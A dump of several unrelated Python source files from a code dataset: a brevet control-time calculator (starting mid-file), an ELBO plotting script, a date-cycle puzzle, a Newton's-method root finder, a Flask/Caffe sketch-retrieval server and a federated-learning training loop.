case\n if control_dist_km > brevet_dist_km * exceed_number:\n return \"\"\n # edge case: ending\n elif brevet_dist_km <= control_dist_km <= brevet_dist_km * exceed_number:\n time = finish_time[brevet_dist_km][0]\n # normal case\n else:\n time = compute_time(control_dist_km, determine_interval(control_dist_km), 1)\n day, hour, minute = get_hour_min_day(time)\n final_time = arrow.get(brevet_start_time).shift(days=+day, hours=+hour, minutes=+minute)\n return final_time.isoformat()\n\n\ndef close_time(control_dist_km, brevet_dist_km, brevet_start_time):\n \"\"\"\n Args:\n control_dist_km: number, the control distance in kilometers\n brevet_dist_km: number, the nominal distance of the brevet\n in kilometers, which must be one of 200, 300, 400, 600, or 1000\n (the only official ACP brevet distances)\n brevet_start_time: An ISO 8601 format date-time string indicating\n the official start time of the brevet\n Returns:\n An ISO 8601 format date string indicating the control close time.\n This will be in the same time zone as the brevet start time.\n \"\"\"\n # invalid case\n if control_dist_km > brevet_dist_km * exceed_number:\n return \"\"\n # edge case: beginning\n elif control_dist_km == 0:\n time = arrow.get(brevet_start_time).shift(hours=+1)\n return time.isoformat()\n # edge case: ending\n elif brevet_dist_km <= control_dist_km <= brevet_dist_km * exceed_number:\n time = finish_time[brevet_dist_km][1]\n # normal case\n else:\n time = compute_time(control_dist_km, determine_interval(control_dist_km), 0)\n day, hour, minute = get_hour_min_day(time)\n final_time = arrow.get(brevet_start_time).shift(days=+day, hours=+hour, minutes=+minute)\n return final_time.isoformat()\n\n","sub_path":"brevets/acp_times.py","file_name":"acp_times.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"529235605","text":"import os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef findnth(string, substring, n):\n\n parts = string.split(substring, n+1)\n\n if len(parts) <= n+1:\n return -1\n\n return len(string)-len(parts[-1])-len(substring)\n\n\nruns = ['2016_07_29_16_50_00']\ncompare = False\n\n\nif __name__ == '__main__':\n\n for run in runs:\n\n filename = os.path.join('code_outputs', run, 'out.txt')\n\n elbos = []\n test_set_elbos = []\n\n with open(filename) as f:\n\n for l in f.readlines():\n if l.startswith('Iteration'):\n elbos.append(float(l[findnth(l, ' ', 3) + 1: findnth(l, ' ', 4)]))\n elif l.startswith('Test set ELBO'):\n test_set_elbos.append(float(l[findnth(l, ' ', 3) + 1: findnth(l, ' ', 4)]))\n\n plt.plot(elbos)\n\n plt.xlabel('Iteration')\n plt.ylabel('Training ELBO')\n\n if not compare:\n\n for f in os.listdir(os.path.join('code_outputs', run)):\n if f.endswith('.py'):\n config_filename = f\n\n if test_set_elbos == []:\n title = config_filename\n else:\n title = config_filename + ': test set ELBO = ' + \"{:,}\".format(test_set_elbos[-1])\n\n # plt.title(title)\n\n plt.savefig(os.path.join('pics/binarized_mnist/elbos', run + '.png'))\n\n plt.clf()\n\n else:\n\n pass\n\n if compare:\n\n plt.savefig(os.path.join('pics/binarized_mnist/elbos', '__'.join(runs) + '.png'))\n","sub_path":"plot_elbos_binarized_mnist.py","file_name":"plot_elbos_binarized_mnist.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"633356801","text":"import sys\n\n\ndef solution():\n E, S, M = map(int, sys.stdin.readline().split())\n e, s, m = 1, 1, 1\n count = 1\n while True:\n if e == E and s == S and m == M:\n return count\n e += 1\n s += 1\n m += 1\n if not e <= 15:\n e = 1\n if not s <= 28:\n s = 1\n if not m <= 19:\n m = 1\n count += 1\n\n\nprint(solution())","sub_path":"python/implementation/1476_날짜계산.py","file_name":"1476_날짜계산.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652122116","text":"# James Morrissey\n# computingID: jpm9rk\n# Use Newton's method to approximate all real roots\n# Newton's Method Applied to e^x + x^2 - x - 4\n\nimport math\n\n\nITERATION_MAX = 100 # max number of iterations\np_initial = 1 # initial point used to find the positive root\np_initial_prime = -2 # initial point used to find the negative root\nPRECISION = 10**(-6) # define the stopping precision\n\ndef function(xvalue): # the function we wish to find the roots of\n yvalue = math.exp(xvalue) + xvalue**2 - xvalue - 4\n return yvalue\n\n\ndef function_derivative(xvalue): # derivative of the previous function\n yvalue = math.exp(xvalue) + 2*xvalue - 1\n return yvalue\n\n\ndef iteration_function(p): # the iteration function for newtons method\n root_approximation = p - function(p)/function_derivative(p)\n return root_approximation\n\n\nfor i in range(ITERATION_MAX): # converges to the positive root\n estimated_root = iteration_function(p_initial)\n estimated_error = abs(estimated_root - p_initial)\n print('the estimated root for iteration', i, 'is', estimated_root)\n print(' the absolute error approximation is', estimated_error)\n p_initial = estimated_root\n if estimated_error < PRECISION: # stopping condition\n print('desired precision achieved')\n break\n\n\nfor i in range(ITERATION_MAX): # converges to the negative root\n estimated_root = iteration_function(p_initial_prime)\n estimated_error = abs(estimated_root - p_initial_prime)\n print('the estimated root for iteration', i, 'is', estimated_root)\n print(' the absolute error approximation is', estimated_error)\n p_initial_prime = estimated_root\n if estimated_error < PRECISION: # stopping condition\n print('desired precision achieved')\n break\n\n# NOTE: Newton's method is highly dependent on the starting value, so I plotted the function to get an idea of where\n# the roots were located, and used 2 separate but identical for loops\n","sub_path":"MORRISSEY_24_14.py","file_name":"MORRISSEY_24_14.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"103597040","text":"#!/usr/bin/python3\n\nimport os\n# set caffe logging to warnings & errors only\nos.environ['GLOG_minloglevel'] = '2'\n\nfrom flask import Flask, request, jsonify, send_from_directory\nfrom io import BytesIO\nfrom PIL import Image\nimport base64\nimport numpy as np\nimport caffe\nfrom sklearn.neighbors import NearestNeighbors\n\ndef load_model(model_root):\n pretrained_model = model_root + 'final.caffemodel' \n sketch_proto = model_root + 'sketchdeploy.prototxt'\n model = caffe.Net(sketch_proto, pretrained_model, caffe.TEST)\n # seems a little strange to have a transform on the sketch images?\n transformer = caffe.io.Transformer({'data': np.shape(model.blobs['data'].data)})\n transformer.set_mean('data', np.array([104, 117, 123]))\n transformer.set_transpose('data',(2,0,1))\n transformer.set_channel_swap('data', (2,1,0))\n transformer.set_raw_scale('data', 255.0)\n return model, transformer\n\ndef load_datasets(datasets_root, n_neighbors=10):\n datasets = {}\n dataset_names = next(os.walk(datasets_root))[1]\n for dataset_name in dataset_names:\n print('Loading dataset ' + dataset_name)\n filenames_path = os.path.join(datasets_root, dataset_name, 'filenames.txt')\n features_path = os.path.join(datasets_root, dataset_name, 'features.npy')\n filenames = open(filenames_path).read().splitlines()\n features = np.load(features_path)\n neighbors = NearestNeighbors(n_neighbors=n_neighbors, algorithm='brute', metric='cosine').fit(features)\n datasets[dataset_name] = {\n 'filenames': filenames,\n 'features': features,\n 'neighbors': neighbors\n }\n return datasets\n\ndef get_features(transformer, model, img):\n sketch = [transformer.preprocess('data', img)]\n sketch = np.asarray(sketch)\n results = model.forward(data=sketch)\n features = results['pool5/7x7_s1_s'].reshape(-1)\n return features\n\ndef get_knn_filenames(dataset, features):\n features = features.reshape(1, -1)\n knns = dataset['neighbors'].kneighbors(features)\n indices = knns[1].reshape(-1)\n filenames = [dataset['filenames'][i] for i in indices]\n return filenames\n\ndef base64_png_to_numpy(data):\n return np.array(Image.open(BytesIO(base64.b64decode(data))))\n\ncaffe.set_mode_gpu()\nmodel, transformer = load_model('../models/triplet_googlenet/Triplet_googlenet_')\ndatasets = load_datasets('../../datasets')\n\napp = Flask(__name__)\n\n@app.route('/sketchy')\ndef root():\n return app.send_static_file('index.html')\n\n@app.route('/sketchy/download//')\ndef send_js(dataset, image):\n root = os.path.join('static', 'datasets', dataset, 'images')\n return send_from_directory(root, image)\n\n@app.route('/sketchy/upload/', methods=['POST'])\ndef upload(dataset):\n img = base64_png_to_numpy(request.data)\n img = img.astype(float) / 255\n features = get_features(transformer, model, img)\n filenames = get_knn_filenames(datasets[dataset], features)\n return jsonify(filenames)\n\napp.run(host='0.0.0.0', port=5000)\n","sub_path":"code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289834399","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport os\nimport multiprocessing\nfrom multiprocessing import Manager\nimport copy\nimport time\nimport numpy as np\nfrom tqdm import tqdm\nimport xlwt\nimport torch\nfrom options import args_parser\nfrom update import LocalUpdate, test_inference\nfrom models import *\nfrom utils import *\nfrom collections import OrderedDict\nfrom xlutils.copy import copy as xlcopy\nfrom xlrd import open_workbook\n\n\n\n\ndef client(i, dic, args, train_dataset, user_images, idx, global_model, epoch):\n # set device\n device_id = (i + 2) % 3\n torch.cuda.set_device(device_id)\n device = 'cuda' \n global_model.to(device)\n print('client id = ' + str(i))\n\n local_model = LocalUpdate(args=args, dataset=train_dataset,\n idxs=user_images, \n user_index=idx, device=device)\n\n w, loss, batchLoss, train_acc = local_model.update_weights(\n model=copy.deepcopy(global_model), global_round=epoch)\n\n tmp = {}\n tmp_w = OrderedDict()\n\n for key, values in w.items():\n tmp_w[key] = values.to('cpu')\n\n tmp['local_weights'] = tmp_w\n tmp['local_losses'] = loss\n\n dic[str(i)] = tmp\n\n \n\n\nif __name__ == '__main__':\n torch.multiprocessing.set_start_method('spawn')\n\n args = args_parser()\n\n f_xls, sheet1 = init_log(args)\n\n start_time1 = time.time()\n \n\n # create directories\n save_path = './EPPFL/save/'\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n folder_name = args.task\n model_path = './EPPFL/save/{}/'.format(folder_name)\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n\n ckp_path = model_path + 'ckps/'\n if not os.path.exists(ckp_path):\n os.mkdir(ckp_path)\n\n # set device\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n\n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n\n # build model\n if args.model == 'VGG19':\n global_model = VGG19(args=args)\n else:\n exit('Error: unrecognized model')\n\n\n # copy weights\n global_weights = global_model.state_dict()\n\n # Training\n train_loss, test_accuracy = [], []\n val_acc_list, net_list = [], []\n cv_loss, cv_acc = [], []\n\n print_every = 10\n val_loss_pre, counter = 0, 0\n iter_num = 1\n \n # Continue trining from a checkpoint\n if args.contfrom != 0:\n global_model = torch.load(ckp_path + str(args.startfrom))\n global_weights = global_model.state_dict()\n f_xls = open_workbook('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name),formatting_info=True)\n f_xls = xlcopy(f_xls) \n sheet1 = f_xls.get_sheet(0)\n\n \n for epoch in tqdm(range(args.epochs)):\n epoch += args.contfrom + 1\n epoch_start_time = time.time()\n local_weights, local_losses = [], []\n\n print(f'\\n | Global Training Round : {epoch} |\\n')\n\n global_model.train()\n num_active_users = max(int(args.frac * args.num_users), 1)\n idxs_users = np.random.choice(range(args.num_users), num_active_users, replace=False)\n\n process_list = []\n dic = Manager().dict()\n\n # training local models\n for i in range(0, num_active_users):\n idx = idxs_users[i]\n user_images = user_groups[idx]\n\n p = multiprocessing.Process(target=client, args=(i, dic, args, \n train_dataset, user_images, idx, global_model, epoch))\n p.start()\n process_list.append(p)\n\n for p in process_list:\n p.join()\n\n for p in process_list:\n p.terminate()\n \n # update global weights\n for key, item in dic.items():\n tmp = OrderedDict()\n for innerkey, value in item['local_weights'].items():\n tmp[innerkey] = value.to(device)\n\n local_weights.append(tmp)\n local_losses.append(item['local_losses'])\n \n # merge models\n global_weights = average_weights(local_weights)\n\n\n global_model.load_state_dict(global_weights)\n loss_avg = sum(local_losses) / len(local_losses) # global training loss\n train_loss.append(loss_avg)\n\n # Calculate avg training accuracy over all users at every epoch\n list_acc, list_loss = [], []\n global_model.eval()\n\n for idx in range(1):\n global_model.to(device)\n acc, _ = test_inference(args=args, test_dataset=test_dataset,model=copy.deepcopy(global_model))\n global_model.to('cpu')\n list_acc.append(acc)\n \n test_accuracy.append(sum(list_acc)/len(list_acc))\n avg_acc = sum(list_acc)/len(list_acc)\n\n sheet1.write(1+epoch, int(6) ,avg_acc)\n sheet1.write(1+epoch, int(7) ,sum(train_loss)/len(train_loss))\n sheet1.write(1+epoch, int(8) ,time.time() - epoch_start_time)\n f_xls.save('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name))\n \n\n if (epoch+1) % print_every == 0:\n torch.save(global_model, ckp_path + str(epoch))\n print(f' \\nAvg Training Stats after {epoch+1} global rounds:')\n print(f'Training Loss : {np.mean(np.array(train_loss))}')\n print('Train Accuracy: {:.2f}% \\n'.format(100*test_accuracy[-1]))\n print('\\n Run Time: {0:0.4f}'.format(time.time()-epoch_start_time))\n\n train_loss = []\n\n print(f' \\n Results after {args.epochs} global rounds of training:')\n print(\"|---- Avg Train Accuracy: {:.2f}%\".format(100*test_accuracy[-1]))\n print(\"|---- Test Accuracy: {:.2f}%\".format(100*acc))\n print('|---- Total Run Time: {0:0.4f}'.format(time.time()-start_time1))\n\n f_xls.save('./EPPFL/save/{}/{}.xls'.format(folder_name, folder_name))\n\n\n\n\n\n \n\n \n\n \n \n\n ","sub_path":"src/federated_main.py","file_name":"federated_main.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}